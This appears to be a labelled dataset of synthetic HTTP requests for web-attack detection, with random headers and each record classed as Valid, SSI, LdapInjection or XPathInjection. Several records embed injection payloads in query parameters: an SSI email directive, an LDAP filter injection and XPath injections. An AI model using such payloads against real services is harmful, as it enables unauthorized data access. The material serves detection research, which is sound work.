Start - Id: 39254
class: SSI
GET /0ZautoexecsQdxPlKOJ8/d7Hx88RyA1Ipi@qXkN/mhlrruOti/hEfKPE/0dsRXachFH6betweenQL49/eNjX2LVa./w@XBsC/3W5J6h/yGgxKLT/e1m6itisbE7xehoiyh/w3eCIHUDsJ1gp/Sag8lztw.jsp?ouealaisus=%3C%21--%23email+fromhost%3D%22www.tcr1r7.com%22+tohost%3D%22mailbox.t2ytT.com%22+message%3D%22odes+thsiuu5+ee2anbo7+dn4%22+fromaddress%3D%22ep7t2t.com%22+toaddress%3D%22iad.eiUe4s.com%22+subject%3D%22bm%22+sender%3D%221ctu.com%22+replyto%3D%229Duagm.com%22+cc%3D%22hmBH%22+inreplyto%3D%22ilo+edtr+iM%22+id%3D%22mni88mail%22+--%3E HTTP/1.1
Host: www.hkgteo.ch:80
Connection: rrxeiuq
Accept: image/*, application/zip, image/png
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 170.255.193.70
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Mon, 18 Jul 05 15:06:57 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Thu, 02 Mar 06 24:45:11 CET
If-Match: "OxLPP4PsZs6hZr26.v"
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 07
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM dGYyZG94dGU5dDFKYXNlaWExZ2ppZW9wY3JhYWVhN3Q=
Range: 5-9725,-6683
Referer: http://www.Trxs9r.fr/9ni0.php4
TE: trailers,deflate,gzip;q=0.3
Trailer: If-Range
User-Agent: Mozilla/8.9 (Windows; U; Win98 8.2; Na-ra; rv:1.7.6) Gecko/05891467
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: HTTP/7.8 www.dome2.css
Transfer-Encoding: identity
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 674 87.251.118.45 "eumooyaaYheigmldr" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39254
Start - Id: 20435
class: Valid
GET /s261TEdjT@oze2NvYp/tr/osbednlinkr/czMKHo@k9M-1lphM/eXLXzAQ9RhI173oC42yQ/espFawids4Dawyon6ae/BwkT./4dsiketiaht/bnhi8ppwnita6ztaett/sapBtc.mdb? HTTP/1.0
Host: 253.221.172.139
Connection: rsazir
Accept: audio/*, audio/basic
Accept-Charset: koi8-r, cp-950
Accept-Encoding: identity, identity;q=0.8
Accept-Language: huoDiod-on, bayg9u-ormd20tq, edTom-tct;q=0.3, n-orcTuh;q=0.2
Cache-Control: no-transform
Client-ip: 138.229.4.76
Cookie: ZdYxlocation=Rok4r;itmdothd=4;ssPDepQFvbscript==>a;ainC2ara=bypRH3YrVZSJ;ae=hee
Cookie2: $Version="63"
Date: Sat, 28 Nov 09 22:08:57 CET
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Tue, 29 Jan 08 10:04:25 GMT
If-Unmodified-Since: Fri, 17 Apr 09 08:44:27 UTC
If-Match: "XvvLPXFU9Xi9M8MD2e"
If-None-Match: "Pj.Aep2BcSE8Xh2A"
If-Range: *
Max-Forwards: 713
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: doxj opcidd=clldteeh
Range: 3549-550636,787196-921,79-
Referer: http://www.Wmstr.fr/nsAdt7t/ltrst9yp/s51e3db/4sLnleeo.fgf
TE: deflate;q=0.0
Trailer: Authorization
User-Agent: Mozilla/3.1 (compatible; emtemnsawt; Open BSD i586; uaa3r6ns; bos6t)
UA-CPU: 68000
UA-Disp: 241,776,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8091x908
Via: 7.3 www.hhUrtnea.jpg, 8.7 214.223.25.165
Transfer-Encoding: gzip
Upgrade: hhhnil/1.6, isE/9.2, pAz/8.4, thSe/0.5
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 36796003300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20435
Start - Id: 38493
class: LdapInjection
GET /wheuItLonntcubE/jetleRsDr/itorrtEoz9reihnyi1ns/yxHLK44Wi3/tV/cous.html?aot=ukaseoeTssaL%2B%3D0&UKE47=cthxtIIrm&eomSopa=16%29%28%26%28objectClass%3Deh6%29%28%7C%28sn+%3D7rrh%29%28cn%3Dtn++J*%29%29&uSmmo8=tsn9ers+3ut HTTP/1.1
Host: www.xnii.de
Connection: close
Accept: video/*
Accept-Charset: cp-932;q=0.4
Accept-Encoding: gzip, deflate;q=0.6, identity, compress
Accept-Language: narcm-u, a-t;q=0.1
Cache-Control: max-stale=7664
Client-ip: 233.33.102.205
Cookie: eicseai=9;yN-K=oQFQOIa.;9uJTxIIih=ial;otTYenfbegwrh=nvther9o tymh;epXrc=vZe9r;CCUS=p@Jvr_.TkXX
Cookie2: $Version="1"
Date: Sat, 03 Apr 10 13:55:40 CET
ETag: W/"ey0oseul4ln@JDqZ7P"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 24 Feb 08 07:33:57 UTC
If-Unmodified-Since: Sat, 03 Apr 04 03:52:52 GMT
If-Match: "cmQJnsXf8rFAYXF"
If-None-Match: *
If-Range: *
Max-Forwards: 256
MIME-Version: 3.3
Pragma: n=Oeif
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: -16785,-63,172810-66
Referer: /ieahn/pvCw8a6i/uasO/owsdjdf/g5idtSt.php3
TE: trailers,chunked;q=0.1
Trailer: Accept-Language
User-Agent: s4V0h@AWM http://www.sniswG0.st
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 185x781
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 955 www.0jeun.css "MnohqAoa9er1renYsg6u" "Wed, 21 Sep 05 20:55:25 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38493
Start - Id: 18036
class: Valid
GET /blEYnph-G/ympaG5MelnT6kIhsF6S/txae/aUhp2dsu/rJo/9ineout/nDggqAv/2dz1zqjo/lfgooh7xFZ/M6q.exe?aeehocttMc=oetlezt5fcbero2c9a&connecteYaVE=%289%25u&ue9mytt=rW_sWrZny&et073hItuoli=2157&hii=OimaaAeayoepha&stdinPXg=Eefsz2eYyeoy6ofw&oaior=122147&4n=gpt&ydil8fnwleeiepb=0&tdVvi=896912 HTTP/1.0
Host: 169.216.247.119
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.7, gzip, compress;q=0.9, identity;q=0.7, identity
Accept-Language: utUeh-egYer;q=0.1
Cache-Control: no-transform
Client-ip: 98.159.11.181
Cookie: 4pG=507;alentnort6lNzS=52940095;paesit=atehuxmr9;isthUiwiclt=53
Cookie2: $Version="74"
Date: Sat, 07 Aug 04 21:38:10 UTC
ETag: "Y5XVc5vLTuEmHw7jl"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Sun, 02 Aug 09 06:45:11 UTC
If-Unmodified-Since: Sun, 29 Apr 07 04:09:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="aicatet"
Authorization: Digest opaque="5stn"
Range: 223-,754-
Referer: /essedd/s3Hmrohh.doc
TE: trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: toerxerac (h3ndSdi; xdINUT)
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 258x9628
Via: 7.9 www.Ilhso0Ar.jpg
Transfer-Encoding: gzip
Upgrade: mnit2e/4.0, 20vtg/4.8, nef3hy/1.1
Warning: 923 136.21.74.55:3970 "tpeOiltiem" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 9297794233
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18036
Start - Id: 49766
class: XPathInjection
GET /hKsdBHA9IHvmP/mOGbQ64d0mlA/3ewrS.mspx?I8oF=moutwlib&gqQh=plfhemr&p6nph-E_SkxcoIn=fcloa%27%5D+%7C+P+++++%7C+++++%2F%2Fuser%5B+name%2Ftext%28++++%29++%3D+%27di&nts=9&lwrennju=Hy2roydre+Benr HTTP/1.0
Host: 75.242.242.219
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=824
Client-ip: 253.1.218.202
Cookie: bemoE2Ss=1929
Cookie2: $Version="367"
Date: Tue, 12 Apr 05 12:57:41 CET
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Wed, 16 Feb 05 17:00:41 GMT
If-Unmodified-Since: Mon, 06 Apr 09 17:52:38 UTC
If-Match: "c98mJwrmUi-fEew6u"
If-None-Match: "DCGQMlwt9OyStRuonJp"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.0
Pragma: ntjrton=tna
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: http://www.Wio6a7y.ch/zIthh9Ni.js
TE: chunked,chunked
Trailer: Connection
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 7.5; Db-ee; rv:5.8.6) Gecko/12338077
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3095x7377
Via: ggttH/6.2 40.50.131.127
Transfer-Encoding: deflate
Upgrade: GSoe/1.5, rrhgtt/1.3, efe/7.8, glEFPo/9.7, sicV8/5.3
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49766
Start - Id: 22638
class: Valid
GET /eo8muuotrepnest/ntfEeahjse/l1_0MgoJbt/wllWBXvGNAk/Nfuousi/wl9hnpxrTyn/tsooMyanf36ibt.jpeg?itsoa=40825&6ghseg=5&dGaivuifnt0eyi=aionh5neeo0feiemr5&Nxa8bo=mrieePsvN%5D3nodeof&mnformWGlhEbsT4=e97X3rr&ubnst=qIhhbrose7niy&seySnn8rwke=asz&eval@7nExKupIK=7tc%3Bin&VAhMCsdeletexand=dqghtn&N2hdqElil=5664226&rr2ohntiare34a=dcatSesfls%29&nMnttT9utgm=c3O34XS HTTP/1.0
Host: www.olng.de
Connection: smvuen
Accept: image/png
Accept-Charset: x-mac-arabic, x-mac-ce;q=0.5, cp-936, iso-8859-4;q=0.8
Accept-Encoding: 
Accept-Language: 4nd-16okwo, 1-orkhaa1
Cache-Control: no-store
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="501"
Date: Tue, 12 Jun 07 03:23:04 CET
ETag: "jot8xJwmgVNxWAsPY-WS"
Expect: konSndn=s2th
From: dsezsSj@hnssHk.cz
If-Modified-Since: Thu, 29 Apr 10 14:36:03 UTC
If-Unmodified-Since: Thu, 21 Sep 06 09:47:19 UTC
If-Match: "8cRbHYKeq6@z9pt"
If-None-Match: "CRGDAiq0w0ocGjm"
If-Range: Tue, 14 Mar 06 10:01:10 GMT
Max-Forwards: 3
MIME-Version: 6.1
Pragma: e='3c'
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: Basic ZmwxZW5nbWY6dGVkdQ==
Range: 93-1710,671040-
Referer: http://8s1t.st/9ekei/uy0a.php
TE: gzip;q=0.2,deflate
Trailer: From
User-Agent: Mozilla/0.0 (X11; U; Solaris 6.6; Eg-Te; rv:1.7.8) Gecko/73188727
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 3.4 www.job2.shtml, HTTP/0.1 www.ooltx.png
Transfer-Encoding: gzip
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 577 www.bnimg.jpeg:110 "ifttahve" "Fri, 14 Jul 06 14:00:28 UTC"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 732034
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22638
Start - Id: 30353
class: Valid
GET /r2/emnehpmo8ieBa6rADah/d1W/lko408.L@2/mtgneO3erzdse/iq.YflP_ZD_MKGOimWHC/eeA7otxTt6otn1sqbr/sahti/ugZs3Y_hR@uSqyT.html?fIt5am565nl=itd&tmpRyOg4=%5BdCe&aeqw8seuso0=atoid0ueus1o&6lsonh5Vo3=4053697 HTTP/1.0
Host: www.ocuellrRl.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2
Accept-Encoding: deflate, gzip
Accept-Language: ksusll0-bp, ktsipnrn-ths;q=0.2, eeln-B4itere, oho-n;q=0.5
Cache-Control: no-cache
Client-ip: 46.149.252.32
Cookie: ru2b7hr9cnttasN=aeOigdt6iuzke5e;Td=he;leahiynq=726058;Ehh2=88816948;satsels=35754842
Cookie2: $Version="3"
Date: Sun, 09 Jan 05 10:33:54 CET
ETag: "TnSJxr_R5tI6N6jhjB"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Wed, 11 Oct 06 24:19:28 GMT
If-Unmodified-Since: Wed, 31 May 06 11:36:28 CET
If-Match: *
If-None-Match: "exr7G9305CUYpaWU"
If-Range: Fri, 18 Nov 05 18:14:01 CET
Max-Forwards: 47
MIME-Version: 7.7
Pragma: ladegi=oet6e
Proxy-Authorization: NTLM ZHdvbWdUdGVvbnNuZWhtTW51Z3MxdGRubTZMdG9DcklyVGV0aHNiZ25raGV1cmhj
Authorization: Digest cnonce="utiL4p"
Range: 05745-,56-61
Referer: /segtat/gtG4te.php
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: eem1/5.0.3.0.3
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 0.1 13.100.108.77, 5.9 www.airan.gif, FTP/1.1 151.96.205.88
Transfer-Encoding: compress
Upgrade: anxrdn/9.4, nRovoy/2.5, p6aym/9.5, 6rc/8.0, nAhe/8.8
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 123.135.81.190
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30353
Start - Id: 35881
class: XPathInjection
GET /a56ED/t7oeauRibhgtoeon9hi9.gif?srcO7nhHTkioyn=tVG8m6h9x&ujtozs=343&rniam=a6DymRG&6elSht=16++++or++++1%3C++++a%2Fpm%2F1%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D79%5D+++or+60704%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&U7koCe6AAv=2a&mR=legtp&tlaHiteR1ao=hMeii&vaso38m=mtelnetpaAemgta&eVAyXlAvbscriptE=2082528&0iolrt7hEroOl=eufez8p+ HTTP/1.1
Host: www.esonhettn.cz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: lc5-ippesd;q=0.3, aSej6ud-ouIorou, si-O1tobts;q=0.7
Cache-Control: Ao=3d
Client-ip: 204.135.13.34
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="462"
Date: Mon, 05 Jan 04 23:43:02 UTC
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 18 Dec 08 06:31:56 UTC
If-Unmodified-Since: Mon, 18 Jul 05 15:05:11 CET
If-Match: *
If-None-Match: "hwzsS1.sHLWWGb4Qyrv6"
If-Range: Thu, 24 Feb 05 15:05:27 CET
Max-Forwards: 72
MIME-Version: 8.2
Pragma: snekhek='neSn2'
Proxy-Authorization: Digest nonce
Authorization: gukiAa ilos2sn=wSa4
Range: 3-18807,30473-219,305975-44534
Referer: /ngczn3r3.asmx
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 4.3; ae-nn; rv:2.6.2) Gecko/46200496
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: ine/4.4 www.kMjsI0.htm
Transfer-Encoding: identity
Upgrade: gcrb/0.6, crsswo/7.2, snqe/2.1
Warning: 101 85.27.216.93 "eLs9meaamietHtrSra" "Sun, 03 Apr 05 18:55:14 CET"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35881
Start - Id: 16287
class: Valid
GET /p_/kfQf/2oadaeReea/4N/inserttelnetz5Nj7@Laccess_logtDoptVk.jpg?sm4esrrgai=18&8WxVg=+i2sF1yuyandocumentfe+&6atTAgiyreha1=tmp%269dso%5B%3Fiexei2ladmin HTTP/1.1
Host: www.x6noe8at.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, compress;q=0.5, identity;q=0.6
Accept-Language: wmhezth-qas, 2ins81-7ROe, Ya-wa;q=0.3
Cache-Control: no-transform
Client-ip: 134.144.136.159
Cookie: APIWTbnTimg0NY=seneeseze;eih1h=tt2;elcbatoeae2mtj=8507;4qzeyhnr=hiyTndttsirtyTi;ear=op2@km0U8S;ZArMbodyFVQ=5 ayf>t6c9r
Cookie2: $Version="7"
Date: Thu, 23 Jul 09 18:14:27 UTC
ETag: W/"7qeV7Do@qmHDm9vCx"
Expect: 100-continue
From: rsnles@lepFrRlre.gov
If-Modified-Since: Thu, 11 Mar 04 05:36:49 GMT
If-Unmodified-Since: Thu, 04 Aug 05 09:55:05 GMT
If-Match: "tUn6ypbOH.3@2Bd4WHSX"
If-None-Match: *
If-Range: Wed, 09 Feb 05 01:03:42 UTC
Max-Forwards: 5103
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: m3tska xmcxng=62Yt
Range: -4823,134863-6,-1714
Referer: http://lg8rtwee.com/oeEra/eaeytt/l5EopoSs/itdE/wItbht.pdf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 5.6; tr-at; rv:8.5.8) Gecko/15901327
UA-CPU: 68000
UA-Disp: 967,6730,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2196x3302
Via: tizeun/9.0 171.206.251.74, 4.7 www.ieSdktr.jpg
Transfer-Encoding: deflate
Upgrade: yejeyl/5.7, ooo/5.3
Warning: 052 186.95.53.70 "owyml9d5dtss6hanh" "Sun, 04 Sep 05 20:42:11 CET"
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16287
Start - Id: 29758
class: Valid
GET /VJ6gjXOrqG/sndinnte4ye7VTerPi/ltYhhmietnaSiqben/rWt.cgi?eadr=iuqz9Thp&uywR2r2hocn=8&lsiurpatZui=2384796&euomlEt=a5%7ELaa&hacqtrsftS=eSdtTv4nahgear&lneo7ly5=tmea+eo%3F&fWhsohosdnrmio=243509&aithoecuoadw3=i&xtilhexepy0=eheyeoecloqt5mhamc HTTP/1.1
Host: 12.67.182.15:09
Connection: close
Accept: image/gif, audio/basic;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, compress;q=0.9, identity;q=0.2
Accept-Language: *
Cache-Control: av=M
Client-ip: 150.197.185.220
Cookie: 8dleEoehe=28;AnRtZQnnmDUG=xswalikejm=;lAnwwtLgotDh=acceptunnda
Cookie2: $Version="64"
Date: Wed, 04 Mar 09 09:38:16 UTC
ETag: W/"AybKivuz6vrGDh10JTrV"
Expect: 100-continue
From: blhdnuR@sEtt7.be
If-Modified-Since: Mon, 23 Feb 04 09:14:47 GMT
If-Unmodified-Since: Thu, 29 Dec 05 03:34:39 UTC
If-Match: *
If-None-Match: *
If-Range: "w112VpIijwuV68-vRli"
Max-Forwards: 96
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: crSDqa Lrjm6ejj=na0tra
Authorization: Basic c3BsT2Z5OnMyY2lQbWVu
Range: 544462-8615
Referer: http://5h0a.de/txnI/jodh/lpdla0.msf
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: mVFfXGB1Yt http://www.utht.it
UA-CPU: MIPS
UA-Disp: 045,174,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: 4.1 94.66.250.243, FTP/1.7 www.uzaruaa3.gif:04, FTP/3.0 9.235.110.103
Transfer-Encoding: gzip
Upgrade: i9y/2.0, idocae/0.1, xaekJa/4.4
Warning: 339 73.130.242.130:62488 "lUaiatecmaeewqtihoat" 
X-Forwarded-For: 150.107.9.100
X-Serial-Number: 55789
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29758
Start - Id: 5735
class: Valid
POST /leoGPyjA/hMHXy3lkwnQLX/open0S_/Swp-S/0rRz.gif? HTTP/1.1
Content-Length: 159
Content-Language: oi4,1lK
Content-Encoding: compress
Content-Location: /enaa/Eiedkgdv/irin/7lncdCss/wrtm.cgi
Content-MD5: ZW5odGl3c2ViT2N0bkVpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Jun 05 09:27:44 UTC
Last-Modified: Sun, 17 Aug 08 07:59:12 UTC
Host: 12.102.110.235:15417
Connection: 9kor
Accept: audio/*, video/*
Accept-Charset: x-mac-arabic, koi8, iso-8859-8-i, x-mac-chinesetrad;q=0.7
Accept-Encoding: 
Accept-Language: EinReRon-ilryaatS;q=0.7
Cache-Control: no-transform
Client-ip: 250.231.142.25
Cookie: taiMi1oh3hswiar=uBRQq;ttnan=45503;notiwe4tW5h=08279;4uPO=2;V6cGexecn3psrzp=553065;8iV.79=ntEw3evSo
Cookie2: $Version="938"
Date: Tue, 11 May 04 19:13:07 GMT
ETag: "jiQXasEX@2DVqAIvgOV"
Expect: so5hes=llarr;emaotu=lqhee4
From: ototLn2u@5heey.uk
If-Modified-Since: Mon, 05 Dec 05 24:22:49 GMT
If-Unmodified-Since: Sun, 05 Dec 04 08:46:45 CET
If-Match: *
If-None-Match: "Eyg9M8y9A2A7j@GKX"
If-Range: Wed, 07 Sep 05 09:47:38 UTC
Max-Forwards: 85
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: exnSr TMrany=hwheanfd
Authorization: Digest opaque="dlalhgC"
Range: 40090-
Referer: http://9lIolosa.ch/Vehmnr.png
TE: trailers,trailers
Trailer: Authorization
User-Agent: ddOeEirhnr (98rYGMy; fT8HN-Srf; lOXSJgh; exwpok18)
UA-CPU: PowerPC
UA-Disp: 830,2987,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3416x9061
Via: HTTP/6.4 www.wIaoznom.js, HTTP/9.8 204.236.97.165, 0.7 www.fSd9ra.jpg
Transfer-Encoding: identity
Upgrade: soi/5.7, trhldd/2.6
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 0056046
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

wn6pehRln=9ny&BKehnsazs2Eq1=aEsc&rxaamAagsjqlrd=5686&wswh4tegmwy32n=osshiro1ssCrh&msahct9pf8nd=titsec&oagdloSaiF=vadminmm1Lc&ootleisco=49338&NinlcPaeu0hOcm=450

End - Id: 5735
Start - Id: 6976
class: Valid
POST /kC2.Q-UQ4ZhIJABCZph/17aBoVK/tonosndn/iaE3fnNOlaeda/se/betweendroppGxDX/ncJT9fkm145paG/tNSrbslsdfsemO.html? HTTP/1.1
Content-Length: 291
Content-Language: o,krprps
Content-Encoding: identity
Content-Location: /eiee5a/re2hseio/aetohhe/8eee8dra.dll
Content-MD5: Y3dydG5uZ3JmZFhCNTNFZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 17:18:14 UTC
Last-Modified: Tue, 05 Oct 04 16:55:57 CET
Host: www.wdrOduut.uk:5553
Connection: close
Accept: image/png;q=0.9
Accept-Charset: x-mac-turkish;q=0.0, x-mac-korean;q=0.4, iso-8859-9
Accept-Encoding: 
Accept-Language: nip-aKfcaa1s;q=0.9, ebosln-dEpuzc;q=0.5, fcde5r-nweqreis, nweeTiex-1aotovs
Cache-Control: min-fresh=72
Client-ip: 252.24.113.133
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Wed, 08 Feb 06 15:12:43 GMT
ETag: W/"NL_m1mDqJIQByLH"
Expect: 100-continue
From: rcaasa4a@Wrn2iB.ch
If-Modified-Since: Tue, 15 Apr 08 02:50:25 GMT
If-Unmodified-Since: Sat, 25 Sep 04 08:15:43 CET
If-Match: "QGJW94s3JIy2dgd"
If-None-Match: *
If-Range: Wed, 04 May 05 06:54:32 CET
Max-Forwards: 6
MIME-Version: 2.6
Pragma: teszo=siNzqta
Proxy-Authorization: Digest qop=auth
Authorization: Digest username="soeUtp"
Range: 2338-,-6,504171-
Referer: /er4wIocq/Idea/jant.doc
TE: gzip;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: t4ietuiuIiOstl9
UA-CPU: 68000
UA-Disp: 535,687,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 0.2 173.22.97.34, tw8o7E/4.9 16.114.166.47
Transfer-Encoding: compress
Upgrade: srd/5.1, ndhns/4.1
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 5.129.82.226
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tee1Yf9sti1IiiI=740705&nxsmbBgutson=00263323&htckpae=Ls&urOlamp=qPnqDwFl2H&ein=lm&93rsaoa9guif3a=childsto&emxPnqcdyaeilm=7422312&shn4lihisqsreda=7&si=4&wgetDmetaYxCxn=hngnyhnzAnom0fpth&itddIhtsbrvmndt=17998050&hxstD0itp6sby=uMqYK&0niunersRhtbe=rotoeti4rin/o9olsock_streamxsxml&3ar0Et=90332

End - Id: 6976
Start - Id: 5519
class: Valid
POST /ugFjCQCLGf5o/mfX@6A7stkjAjulB/1ttesyhieicslvhrz/olshutdownbetweeni/J7gM.sh? HTTP/1.0
Content-Length: 65
Content-Language: uapitdhl,ee9
Content-Encoding: compress
Content-Location: /ff7yi2.exe
Content-MD5: b3dFRWN0YmFsaHVuVHRzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 05:52:37 GMT
Last-Modified: Sun, 24 Sep 06 17:23:56 UTC
Host: 226.97.207.95
Connection: ersnf
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: voLataua-rrS
Cache-Control: only-if-cached
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="423"
Date: Sun, 16 Oct 05 09:38:48 GMT
ETag: W/"n7Wwtmu3A7ci1M7fBJ"
Expect: 100-continue
From: bb6hm7@ei9Ace.org
If-Modified-Since: Sun, 21 Mar 04 10:36:43 GMT
If-Unmodified-Since: Tue, 09 Feb 10 07:30:57 GMT
If-Match: *
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="hnr4higt"
Authorization: Basic NG5ueWk6bk5SaG50THQ=
Range: 4-,7992-3492,625-
Referer: /camtrv.jsp
TE: gzip
Trailer: Max-Forwards
User-Agent: oept3grmmToEeEM
UA-CPU: x86
